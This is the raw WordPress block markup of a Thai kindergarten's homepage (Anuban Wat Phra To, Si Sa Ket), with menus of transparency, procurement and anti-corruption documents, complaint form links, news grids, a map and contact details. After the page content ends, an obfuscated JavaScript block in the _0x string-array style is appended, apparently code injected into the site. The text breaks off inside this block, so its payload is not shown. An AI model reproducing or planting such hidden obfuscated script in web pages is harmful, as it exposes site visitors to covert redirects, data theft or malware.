gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_OWLmL8dNlhDoQ0UR8jPN_Xxi6zx20T1/view?usp=drive_link\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1H4PRZlpAa4ZD6uq6Ew5Wx3nLXGcUNa09/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 